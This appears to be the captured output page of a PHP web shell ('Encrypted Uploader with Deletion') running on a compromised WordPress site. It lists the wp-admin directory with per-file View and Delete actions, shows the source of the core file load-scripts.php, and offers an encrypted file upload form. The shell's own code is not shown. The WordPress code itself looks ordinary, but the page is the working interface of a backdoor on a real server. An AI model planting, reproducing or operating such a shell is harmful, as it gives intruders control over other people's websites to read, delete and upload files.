PHP Shell - Encrypted Uploader with Deletion

Directory: /home/deremeavgh/www/wp-admin

Name	Type	Action
..	DIR	Open
.rnd	FILE	View Delete
about.php	FILE	View Delete
admin-ajax.php	FILE	View Delete
admin-footer.php	FILE	View Delete
admin-functions.php	FILE	View Delete
admin-header.php	FILE	View Delete
admin-post.php	FILE	View Delete
admin.php	FILE	View Delete
async-upload.php	FILE	View Delete
authorize-application.php	FILE	View Delete
comment.php	FILE	View Delete
contribute.php	FILE	View Delete
credits.php	FILE	View Delete
css	DIR	Open
custom-background.php	FILE	View Delete
custom-header.php	FILE	View Delete
customize.php	FILE	View Delete
edit-comments.php	FILE	View Delete
edit-form-advanced.php	FILE	View Delete
edit-form-blocks.php	FILE	View Delete
edit-form-comment.php	FILE	View Delete
edit-link-form.php	FILE	View Delete
edit-tag-form.php	FILE	View Delete
edit-tags.php	FILE	View Delete
edit.php	FILE	View Delete
erase-personal-data.php	FILE	View Delete
export-personal-data.php	FILE	View Delete
export.php	FILE	View Delete
freedoms.php	FILE	View Delete
images	DIR	Open
import.php	FILE	View Delete
includes	DIR	Open
index.php	FILE	View Delete
install-helper.php	FILE	View Delete
install.php	FILE	View Delete
js	DIR	Open
link-add.php	FILE	View Delete
link-manager.php	FILE	View Delete
link-parse-opml.php	FILE	View Delete
link.php	FILE	View Delete
load-scripts.php	FILE	View Delete
load-styles.php	FILE	View Delete
maint	DIR	Open
media-new.php	FILE	View Delete
media-upload.php	FILE	View Delete
media.php	FILE	View Delete
menu-header.php	FILE	View Delete
menu.php	FILE	View Delete
moderation.php	FILE	View Delete
ms-admin.php	FILE	View Delete
ms-delete-site.php	FILE	View Delete
ms-edit.php	FILE	View Delete
ms-options.php	FILE	View Delete
ms-sites.php	FILE	View Delete
ms-themes.php	FILE	View Delete
ms-upgrade-network.php	FILE	View Delete
ms-users.php	FILE	View Delete
my-sites.php	FILE	View Delete
nav-menus.php	FILE	View Delete
network	DIR	Open
network.php	FILE	View Delete
options-discussion.php	FILE	View Delete
options-general.php	FILE	View Delete
options-head.php	FILE	View Delete
options-media.php	FILE	View Delete
options-permalink.php	FILE	View Delete
options-privacy.php	FILE	View Delete
options-reading.php	FILE	View Delete
options-writing.php	FILE	View Delete
options.php	FILE	View Delete
plugin-editor.php	FILE	View Delete
plugin-install.php	FILE	View Delete
plugins.php	FILE	View Delete
post-new.php	FILE	View Delete
post.php	FILE	View Delete
press-this.php	FILE	View Delete
privacy-policy-guide.php	FILE	View Delete
privacy.php	FILE	View Delete
profile.php	FILE	View Delete
revision.php	FILE	View Delete
setup-config.php	FILE	View Delete
site-editor.php	FILE	View Delete
site-health-info.php	FILE	View Delete
site-health.php	FILE	View Delete
term.php	FILE	View Delete
theme-editor.php	FILE	View Delete
theme-install.php	FILE	View Delete
themes.php	FILE	View Delete
tools.php	FILE	View Delete
update-core.php	FILE	View Delete
update.php	FILE	View Delete
upgrade-functions.php	FILE	View Delete
upgrade.php	FILE	View Delete
upload.php	FILE	View Delete
user	DIR	Open
user-edit.php	FILE	View Delete
user-new.php	FILE	View Delete
users.php	FILE	View Delete
widgets-form-blocks.php	FILE	View Delete
widgets-form.php	FILE	View Delete
widgets.php	FILE	View Delete

File: /home/deremeavgh/www/wp-admin/load-scripts.php

<?php

/*
 * Disable error reporting.
 *
 * Set this to error_reporting( -1 ) for debugging.
 */
error_reporting( 0 );

// Set ABSPATH for execution.
if ( ! defined( 'ABSPATH' ) ) {
	define( 'ABSPATH', dirname( __DIR__ ) . '/' );
}

define( 'WPINC', 'wp-includes' );

$protocol = $_SERVER['SERVER_PROTOCOL'];
if ( ! in_array( $protocol, array( 'HTTP/1.1', 'HTTP/2', 'HTTP/2.0', 'HTTP/3' ), true ) ) {
	$protocol = 'HTTP/1.0';
}

$load = $_GET['load'];
if ( is_array( $load ) ) {
	ksort( $load );
	$load = implode( '', $load );
}

$load = preg_replace( '/[^a-z0-9,_-]+/i', '', $load );
$load = array_unique( explode( ',', $load ) );

if ( empty( $load ) ) {
	header( "$protocol 400 Bad Request" );
	exit;
}

require ABSPATH . 'wp-admin/includes/noop.php';
require ABSPATH . WPINC . '/script-loader.php';
require ABSPATH . WPINC . '/version.php';

$expires_offset = 31536000; // 1 year.
$out            = '';

$wp_scripts = new WP_Scripts();
wp_default_scripts( $wp_scripts );
wp_default_packages_vendor( $wp_scripts );
wp_default_packages_scripts( $wp_scripts );

$etag = "WP:{$wp_version};";

foreach ( $load as $handle ) {
	if ( ! array_key_exists( $handle, $wp_scripts->registered ) ) {
		continue;
	}

	$ver   = $wp_scripts->registered[ $handle ]->ver ? $wp_scripts->registered[ $handle ]->ver : $wp_version;
	$etag .= "{$handle}:{$ver};";
}

/*
 * This is not intended to be cryptographically secure, just a fast way to get
 * a fixed length string based on the script versions. As this file does not
 * load the full WordPress environment, it is not possible to use the salted
 * wp_hash() function.
 */
$etag = 'W/"' . md5( $etag ) . '"';

if ( isset( $_SERVER['HTTP_IF_NONE_MATCH'] ) && stripslashes( $_SERVER['HTTP_IF_NONE_MATCH'] ) === $etag ) {
	header( "$protocol 304 Not Modified" );
	exit;
}

foreach ( $load as $handle ) {
	if ( ! array_key_exists( $handle, $wp_scripts->registered ) ) {
		continue;
	}

	$path = ABSPATH . $wp_scripts->registered[ $handle ]->src;
	$out .= get_file( $path ) . "\n";
}

header( "Etag: $etag" );
header( 'Content-Type: application/javascript; charset=UTF-8' );
header( 'Expires: ' . gmdate( 'D, d M Y H:i:s', time() + $expires_offset ) . ' GMT' );
header( "Cache-Control: public, max-age=$expires_offset" );

echo $out;
exit;

Directory: /home/deremeavgh/www/wp-admin

File: /home/deremeavgh/www/wp-admin/load-scripts.php

Upload Encrypted File